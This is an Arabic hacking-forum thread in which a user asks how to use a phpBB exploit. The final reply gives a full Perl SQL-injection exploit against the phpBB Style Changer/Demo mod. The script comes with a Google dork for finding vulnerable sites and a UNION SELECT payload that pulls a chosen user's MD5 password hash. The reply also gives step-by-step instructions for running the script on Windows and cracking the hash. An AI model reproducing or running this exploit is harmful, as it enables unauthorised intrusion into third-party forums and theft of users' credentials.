أطلب شرح لأصحاب الخبرة في الثغرات

أطلب شرح لأصحاب الخبرة في الثغرات


النتائج 1 إلى 5 من 5

الموضوع: أطلب شرح لأصحاب الخبرة في الثغرات

  1. #1

    افتراضي أطلب شرح لأصحاب الخبرة في الثغرات

    السلام عليكم


    كيف الحال



    إذا ممكن أحد يشرحلي إستغلال ثغرت phpBB وكيف إستخدامها و لو يكون بالصور


    يكون أحسن بارك الله فيكم.

  2. #2

    افتراضي رد: أطلب شرح لأصحاب الخبرة في الثغرات

    على الأقل واحد يدخل ويقول أنا ماعرف

  3. #3

    افتراضي رد: أطلب شرح لأصحاب الخبرة في الثغرات

    ثااااااااااااااااااااااان كيووو

  4. #4

    افتراضي رد: أطلب شرح لأصحاب الخبرة في الثغرات

    انا ما اعرف

  5. #5

    افتراضي رد: أطلب شرح لأصحاب الخبرة في الثغرات

    [grade="00008B FF6347 008000 4B0082"]ڪْيًفيًة معّرٍفة آلِثغرٍآتِ آلِمڪْتِوَبة بآلِغة آلِبيًرٍلِ ..؟
    عّندِمآ ننظرٍ آلِـﮯ آـﮯ ڪْوَدِ وَ نجدِ فـﮯ بدِآيًتِة :
    [/grade]

    كود PHP:
     #!/usr/bin/perl 
    [grade="DEB887 D2691E A0522D"]آذآ عّلِيًنآ آن نعّلِم آن آلِثغرٍة آلِتِـﮯ سّوَف نتِعّآملِ معّهآ هـﮯ آحدِـﮯ آلِثغرٍآتِ آلِمڪْتِوَبة بلِغة آلِبيًرٍلِ ..
    طرٍيًقة آلآسّتِغلآلِ :
    ـــــــــــــــــــــــــ ـــــــــ
    آوَلآ:: آذآ ڪْنتِم من مسّتِخدِميًن بيًئة آلِلِيًوَنڪْسّ فهذآ شـﮯء ممتِآز جدِآ وَ لآ حآجة لآـﮯ برٍنآمج وَ آعّتِقدِ آيًضآ آنڪْم لِسّتِوَ فـﮯ حآجة لِقرٍأة هذـﮯ آلِدِرٍسّ .
    آمآ آذآ ڪْنتِم من مسّتِخدِمـﮯ بيًئة آلِوَيًندِوَز فعّلِيًڪْم بأسّتِخدِم برٍنآمج ActivePerl
    وَ ذآلِڪْ لِعّملِ ڪْوَبيًلِرٍ لآڪْوَآدِ آلِبيًرٍلِ .
    وَ هذة وَصلِة لِلِبرٍنآمج ::
    [/grade]
    اضغط على ......الجيووووووش......
    آلآن بعّدِ تِحميًلِ آلِبرٍنآمج وَ عّملِ Setup لِة عّلِـﮯ آلِجهآز سّوَف يًڪْوَن عّلِـﮯ هذآ آلِمسّآرٍ .
    كود PHP:
     C:\Perl 
    آلآن ڪْلِ شـﮯء تِمآم نبدِآ آلِعّملِ
    بعّدِ آن نجدِ آحدِ آلِثغرٍآتِ مثآلِ حنآخدِ ڪْمثآلِ آحدِ آلِثغرٍآتِ آلِلِـﮯ وَضعّتِهم لِڪْم فـﮯ قسّم آلِثغرٍآتِ وَ هـﮯ ::

    كود PHP:
    #!/usr/bin/perl
    #########################################################
    #         _______ _______ ______         #
    #         |______ |______ |     \        #
    #         ______| |______ |_____/        #
    #                                        #
    #phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT    #
    #Created By SkOd                                        #
    #SED security Team                                      #
    #http://www.sed-team.be                                 #
    #[email protected]                                      #
    #ISRAEL                                                 #
    #########################################################
    #google:
    #"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
    #########################################################
    use IO::Socket;
    if (@
    ARGV 3){
    print 
    q{
    ############################################################
    #   phpBB Style Changer\Viewer MOD SQL injection Exploit   #
    #        Tested on phpBB 2.0.19               #
    #        created By SkOd. SED Security Team             #
    ############################################################
    bbstyle.pl [HOST] [PATH] [Target id]
    bbstyle.pl www.host.com /phpbb22
    ############################################################
    };
    exit;
    }
    $serv $ARGV[0];
    $dir $ARGV[1];
    $id $ARGV[2];
    print 
    "[+]Make Connection\n";
    $serv =~ s/(http:\/\/)//eg;
    $path $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
    $socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$serv"PeerPort => "80") || die "[-]Connect Failed\r\n";
    print 
    $socket "GET $path HTTP/1.1\n";
    print 
    $socket "Host: $serv\n";
    print 
    $socket "Accept: */*\n";
    print 
    $socket "Connection: close\n\n";
    print 
    "[+]Connected\n";
    while (
    $hash = <$socket>){
    $hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";

    آوَلِ شـﮯء تِسّوَوَوَيًه بعّدِ معّرٍفتِنآ آن هذآ آلِڪْوَدِ لآحدِ ثغرٍآتِ آلِبيًرٍلِ هوَ آننآ نأخدِ آلِڪْوَدِ ڪْلِة Copy وَنضعّة Past فـﮯ آلِـ Notbad وَ نغلِقهآ حيًطلِب منڪْ عّملِ Save نضغط عّلِـﮯ ڪْلِمة Yes آلآن لِدِيًنآ آلِڪْوَدِ عّلِـﮯ هيًئة txt عّلِيًنآ آن نغيًرٍ آلآمتِدِآدِ من txt آلِـﮯ pl نفتِرٍض آننآ سّوَف نقوَم بتِسّميًة آلِملِف exploit.txt عّلِيًنآ آن نغيًرٍ txt لِيًصبح بهذآ آلِشڪْلِ exploit.pl آلآن وَ بعّدِ آلِتِأڪْدِ من آتِمآم هذة آلِعّملِيًة بنجآح عّلِيًنآ آن ضعّ آلِملِف exploit.pl دِآخلِ آلِملِف bin عّلِـﮯ هذآ آلِمسّآرٍ

    كود PHP:
    C:\Perl\bin 
    [grade="FF4500 4B0082 0000FF 000000 F4A460"]وَ بعّدِ وَ ضعّ آلِملِف دِآخلِ هذآ آلِمجلِدِ نذهب آلِـﮯ آلِـ Run آلِموَجوَدِة ضمن قآئمة Start وَ نڪْتِب cmd سّيًظهرٍ لِنآ شآشة آلِدِوَسّ
    وَ بعّدِ ذآلِڪْ ::
    وَ بعّدِ آن يًتِم عّملِ آلِتِرٍجمة لِملِف آلِبيًرٍلِ وَ يًفتِح آمآمنآ سّوَف نشآهدِ طرٍيًقة آلآسّتِخدِآم آلِخآص لِهذة آلِثغرٍة
    وَ ڪْلِ ثغرٍة لِهآ طرٍيًقة آلآسّتِخدِآم آلِخآصة بهآ
    نڪْتِب آلِمطلِوَب وَ نظغط آنتِرٍ وَ شوَف آلِنتِيًجة عّلِـﮯ حسّب نوَعّ آلِثغرٍة وَ عّندِ آلِحصوَلِ
    عّلِـﮯ آلِبآسّوَرٍدِ بيًڪْوَن بشڪْلِ مشفرٍ مآعّلِيًڪْ آلآ آنڪْ تِفڪْة بأـﮯ برٍنآمج آوَ موَقعّ من موَآقعّ فڪْ آلِبآسّوَرٍدِ ..
    وَآن شآء آلِلِه آنيً قدِرٍتِ آفيًدِڪْ ڪْذآ تِقبلِ مرٍوَرٍيً
    ~ ^
    [/grade]

المواضيع المتشابهه

  1. [كتاب] اوامر الشيل لأصحاب السيرفرات
    بواسطة ASDELY-ScOrPiOn في المنتدى دروس و شروحات السيرفرات
    مشاركات: 18
    آخر مشاركة: 02-05-2012, 08:31 PM
  2. أطلب أي شرح وأي برنامج ومشاكل تبليغ هنا
    بواسطة black-lion في المنتدى قسم اختراق الأجهزة
    مشاركات: 16
    آخر مشاركة: 07-11-2010, 05:25 PM
  3. أطلب أي برنامج ورح يكون عندك في أقل من 10 دقائق
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 291
    آخر مشاركة: 06-23-2010, 12:48 PM
  4. مساعدة ياشباب (اصحاب الخبرة)
    بواسطة aboy في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 10-30-2009, 02:41 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •